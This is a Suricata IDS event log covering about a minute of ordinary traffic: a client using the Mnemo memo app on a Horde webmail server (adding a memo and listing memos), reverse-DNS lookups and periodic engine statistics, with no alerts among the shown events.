{"timestamp":"2020-02-29T00:05:47.000249+0000","flow_id":2122532734704388,"event_type":"flow","src_ip":"192.168.10.122","src_port":56423,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:00:45.989956+0000","end":"2020-02-29T00:00:46.095007+0000","age":1,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:05:47.001105+0000","flow_id":1206437685387358,"event_type":"flow","src_ip":"192.168.10.122","src_port":59463,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:00:46.155742+0000","end":"2020-02-29T00:00:46.261061+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:05:47.656994+0000","flow_id":1275784246733683,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52688,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/mnemo\/js\/memo.js?v=bef6a81df654c73d2a7fc487bc2a4694","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/mnemo\/memo.php?actionID=add_memo","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":581},"app_proto":"http","fileinfo":{"filename":"\/mnemo\/js\/memo.js","state":"CLOSED","stored":false,"size":1565,"tx_id":1}} 
{"timestamp":"2020-02-29T00:05:50.005989+0000","event_type":"stats","stats":{"uptime":14002,"capture":{"kernel_packets":133527,"kernel_drops":0},"decoder":{"pkts":133528,"bytes":92417809,"invalid":181,"ipv4":132081,"ipv6":8,"ethernet":133528,"raw":0,"null":0,"sll":0,"tcp":126986,"udp":4900,"sctp":0,"icmpv4":14,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":692,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7097344},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2704,"ssn_memcap_drop":0,"pseudo":340,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2720,"synack":2711,"rst":1194,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":139,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1747,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":102,"dcerpc_udp":0,"dns_udp":2234,"failed_udp":110},"tx":{"http":4531,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2311}},"flow_mgr":{"closed_pruned":2685,"new_pruned":15,"est_pruned":2277,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65536,"rows_empty":0,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":21827,"memcap_state":0,"memcap_global":0},"http":{"memuse":45255,"memcap":0}}} 
{"timestamp":"2020-02-29T00:05:51.000750+0000","flow_id":2068106924568790,"event_type":"flow","src_ip":"192.168.10.130","src_port":34734,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":9,"pkts_toclient":9,"bytes_toserver":1517,"bytes_toclient":6243,"start":"2020-02-29T00:04:40.307414+0000","end":"2020-02-29T00:04:50.024265+0000","age":10,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:05:52.601288+0000","flow_id":2021948915723464,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":38270,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":16280,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:05:52.710276+0000","flow_id":2021948915723464,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":38270,"proto":"UDP","dns":{"type":"answer","id":16280,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:05:52.710276+0000","flow_id":2021948915723464,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":38270,"proto":"UDP","dns":{"type":"answer","id":16280,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:05:52.739096+0000","flow_id":1224077136164186,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52690,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/horde\/imple?token=t178Jy_bOFAgZYI5pak0cNw&app=mnemo&imple=Mnemo_Ajax_Imple_TagAutoCompleter&input=memo_tags","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/mnemo\/memo.php?actionID=add_memo","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":34}} {"timestamp":"2020-02-29T00:05:52.739096+0000","flow_id":1224077136164186,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.81","src_port":52690,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/horde\/imple?token=t178Jy_bOFAgZYI5pak0cNw&app=mnemo&imple=Mnemo_Ajax_Imple_TagAutoCompleter&input=memo_tags","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/mnemo\/memo.php?actionID=add_memo","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":34},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/horde\/imple","state":"CLOSED","stored":false,"size":12,"tx_id":0}} {"timestamp":"2020-02-29T00:05:56.666157+0000","flow_id":1224077136164186,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52690,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/horde\/imple?token=t178Jy_bOFAgZYI5pak0cNw&app=mnemo&imple=Mnemo_Ajax_Imple_TagAutoCompleter&input=memo_tags","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/mnemo\/memo.php?actionID=add_memo","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":34},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/horde\/imple","state":"CLOSED","stored":false,"size":14,"tx_id":0}} 
{"timestamp":"2020-02-29T00:05:56.679058+0000","flow_id":1544546121178258,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":59017,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":51727,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:05:56.787069+0000","flow_id":1544546121178258,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":59017,"proto":"UDP","dns":{"type":"answer","id":51727,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:05:56.787069+0000","flow_id":1544546121178258,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":59017,"proto":"UDP","dns":{"type":"answer","id":51727,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:05:56.852567+0000","flow_id":1224077136164186,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52690,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/mnemo\/memo.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/memo.php?actionID=add_memo","http_method":"POST","protocol":"HTTP\/1.1","status":302,"redirect":"http:\/\/mail.spiral.com\/mnemo\/list.php","length":20}} {"timestamp":"2020-02-29T00:05:56.852567+0000","flow_id":1224077136164186,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.81","src_port":52690,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/mnemo\/memo.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/memo.php?actionID=add_memo","http_method":"POST","protocol":"HTTP\/1.1","status":302,"redirect":"http:\/\/mail.spiral.com\/mnemo\/list.php","length":20},"app_proto":"http","fileinfo":{"filename":"\/mnemo\/memo.php","state":"CLOSED","stored":false,"size":199,"tx_id":1}} {"timestamp":"2020-02-29T00:05:56.863955+0000","flow_id":787811538317011,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":36067,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":14745,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:05:56.972258+0000","flow_id":787811538317011,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":36067,"proto":"UDP","dns":{"type":"answer","id":14745,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:05:56.972258+0000","flow_id":787811538317011,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":36067,"proto":"UDP","dns":{"type":"answer","id":14745,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} 
{"timestamp":"2020-02-29T00:05:57.000120+0000","event_type":"stats","stats":{"uptime":14009,"capture":{"kernel_packets":133531,"kernel_drops":0},"decoder":{"pkts":133537,"bytes":92419642,"invalid":181,"ipv4":132090,"ipv6":8,"ethernet":133537,"raw":0,"null":0,"sll":0,"tcp":126993,"udp":4902,"sctp":0,"icmpv4":14,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":692,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7097632},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2705,"ssn_memcap_drop":0,"pseudo":340,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2721,"synack":2712,"rst":1194,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":139,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1748,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":102,"dcerpc_udp":0,"dns_udp":2235,"failed_udp":110},"tx":{"http":4532,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2312}},"flow_mgr":{"closed_pruned":2686,"new_pruned":15,"est_pruned":2277,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65536,"rows_empty":0,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":22817,"memcap_state":0,"memcap_global":0},"http":{"memuse":51120,"memcap":0}}} 
{"timestamp":"2020-02-29T00:05:57.055887+0000","flow_id":1224077136164186,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52690,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/mnemo\/list.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/memo.php?actionID=add_memo","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5388}} {"timestamp":"2020-02-29T00:06:02.060739+0000","flow_id":1224077136164186,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52690,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/mnemo\/list.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/memo.php?actionID=add_memo","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5388},"app_proto":"http","fileinfo":{"filename":"\/mnemo\/list.php","state":"CLOSED","stored":false,"size":26117,"tx_id":2}} 
{"timestamp":"2020-02-29T00:06:04.000168+0000","event_type":"stats","stats":{"uptime":14016,"capture":{"kernel_packets":133556,"kernel_drops":0},"decoder":{"pkts":133559,"bytes":92428714,"invalid":181,"ipv4":132110,"ipv6":8,"ethernet":133559,"raw":0,"null":0,"sll":0,"tcp":127009,"udp":4906,"sctp":0,"icmpv4":14,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":692,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7098208},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2705,"ssn_memcap_drop":0,"pseudo":340,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2721,"synack":2712,"rst":1194,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":139,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1748,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":102,"dcerpc_udp":0,"dns_udp":2237,"failed_udp":110},"tx":{"http":4534,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2314}},"flow_mgr":{"closed_pruned":2686,"new_pruned":15,"est_pruned":2277,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65536,"rows_empty":0,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":22817,"memcap_state":0,"memcap_global":0},"http":{"memuse":45255,"memcap":0}}} 
{"timestamp":"2020-02-29T00:06:10.000595+0000","flow_id":1750343770728430,"event_type":"flow","src_ip":"192.168.10.81","src_port":52686,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":5,"pkts_toclient":5,"bytes_toserver":774,"bytes_toclient":1067,"start":"2020-02-29T00:05:04.223214+0000","end":"2020-02-29T00:05:09.228332+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:06:10.001033+0000","flow_id":1969571786109511,"event_type":"flow","src_ip":"192.168.10.81","src_port":52684,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":20,"pkts_toclient":24,"bytes_toserver":4346,"bytes_toclient":20355,"start":"2020-02-29T00:04:59.373319+0000","end":"2020-02-29T00:05:09.312383+0000","age":10,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} 
{"timestamp":"2020-02-29T00:06:11.000176+0000","event_type":"stats","stats":{"uptime":14023,"capture":{"kernel_packets":133556,"kernel_drops":0},"decoder":{"pkts":133559,"bytes":92428714,"invalid":181,"ipv4":132110,"ipv6":8,"ethernet":133559,"raw":0,"null":0,"sll":0,"tcp":127009,"udp":4906,"sctp":0,"icmpv4":14,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":692,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7097632},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2705,"ssn_memcap_drop":0,"pseudo":340,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2721,"synack":2712,"rst":1194,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":139,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1748,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":102,"dcerpc_udp":0,"dns_udp":2237,"failed_udp":110},"tx":{"http":4534,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2314}},"flow_mgr":{"closed_pruned":2686,"new_pruned":15,"est_pruned":2277,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65536,"rows_empty":0,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":22817,"memcap_state":0,"memcap_global":0},"http":{"memuse":45095,"memcap":0}}} 
{"timestamp":"2020-02-29T00:06:13.000304+0000","flow_id":579007405056244,"event_type":"flow","src_ip":"192.168.10.130","src_port":34738,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":10,"pkts_toclient":9,"bytes_toserver":1155,"bytes_toclient":7102,"start":"2020-02-29T00:05:07.352500+0000","end":"2020-02-29T00:05:12.708945+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:06:14.005733+0000","flow_id":1227397127562127,"event_type":"flow","src_ip":"192.168.10.122","src_port":57294,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:01:13.484239+0000","end":"2020-02-29T00:01:13.598172+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:06:17.000973+0000","flow_id":413775703090290,"event_type":"flow","src_ip":"192.168.10.122","src_port":35934,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:01:16.894066+0000","end":"2020-02-29T00:01:16.999282+0000","age":0,"state":"established","reason":"timeout","alerted":false}} 
{"timestamp":"2020-02-29T00:06:18.000275+0000","event_type":"stats","stats":{"uptime":14030,"capture":{"kernel_packets":133556,"kernel_drops":0},"decoder":{"pkts":133559,"bytes":92428714,"invalid":181,"ipv4":132110,"ipv6":8,"ethernet":133559,"raw":0,"null":0,"sll":0,"tcp":127009,"udp":4906,"sctp":0,"icmpv4":14,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":692,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7096768},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2705,"ssn_memcap_drop":0,"pseudo":340,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2721,"synack":2712,"rst":1194,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":139,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1748,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":102,"dcerpc_udp":0,"dns_udp":2237,"failed_udp":110},"tx":{"http":4534,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2314}},"flow_mgr":{"closed_pruned":2689,"new_pruned":15,"est_pruned":2278,"bypassed_pruned":0,"flows_checked":1,"flows_notimeout":1,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65535,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":22157,"memcap_state":0,"memcap_global":0},"http":{"memuse":45015,"memcap":0}}} 
{"timestamp":"2020-02-29T00:06:18.002196+0000","flow_id":1558539106348560,"event_type":"flow","src_ip":"192.168.10.122","src_port":56244,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:01:17.421392+0000","end":"2020-02-29T00:01:17.526761+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:06:19.000515+0000","flow_id":342874398464368,"event_type":"flow","src_ip":"192.168.10.130","src_port":34740,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":9,"pkts_toclient":7,"bytes_toserver":1079,"bytes_toclient":4180,"start":"2020-02-29T00:05:13.268656+0000","end":"2020-02-29T00:05:18.458861+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:06:21.000394+0000","flow_id":752305025627883,"event_type":"flow","src_ip":"192.168.10.122","src_port":44785,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:01:20.243435+0000","end":"2020-02-29T00:01:20.354683+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:06:21.002044+0000","flow_id":1043121556102940,"event_type":"flow","src_ip":"192.168.10.122","src_port":37302,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:01:19.991004+0000","end":"2020-02-29T00:01:20.096028+0000","age":1,"state":"established","reason":"timeout","alerted":false}} 
{"timestamp":"2020-02-29T00:06:24.000289+0000","flow_id":992711525217637,"event_type":"flow","src_ip":"192.168.10.122","src_port":57146,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:01:23.144741+0000","end":"2020-02-29T00:01:23.249667+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:06:24.001303+0000","flow_id":644114799654146,"event_type":"flow","src_ip":"192.168.10.122","src_port":41023,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:01:23.849154+0000","end":"2020-02-29T00:01:23.954296+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:06:24.001991+0000","flow_id":509385984074491,"event_type":"flow","src_ip":"192.168.10.130","src_port":34736,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":9,"pkts_toclient":9,"bytes_toserver":1495,"bytes_toclient":6239,"start":"2020-02-29T00:04:50.025339+0000","end":"2020-02-29T00:05:23.459884+0000","age":33,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} 
{"timestamp":"2020-02-29T00:06:25.000302+0000","event_type":"stats","stats":{"uptime":14037,"capture":{"kernel_packets":133563,"kernel_drops":0},"decoder":{"pkts":133563,"bytes":92428978,"invalid":181,"ipv4":132114,"ipv6":8,"ethernet":133563,"raw":0,"null":0,"sll":0,"tcp":127013,"udp":4906,"sctp":0,"icmpv4":14,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":692,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7094752},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2705,"ssn_memcap_drop":0,"pseudo":340,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2721,"synack":2712,"rst":1194,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":139,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1748,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":102,"dcerpc_udp":0,"dns_udp":2237,"failed_udp":110},"tx":{"http":4534,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2314}},"flow_mgr":{"closed_pruned":2690,"new_pruned":15,"est_pruned":2282,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65536,"rows_empty":0,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":20504,"memcap_state":0,"memcap_global":0},"http":{"memuse":44855,"memcap":0}}} 
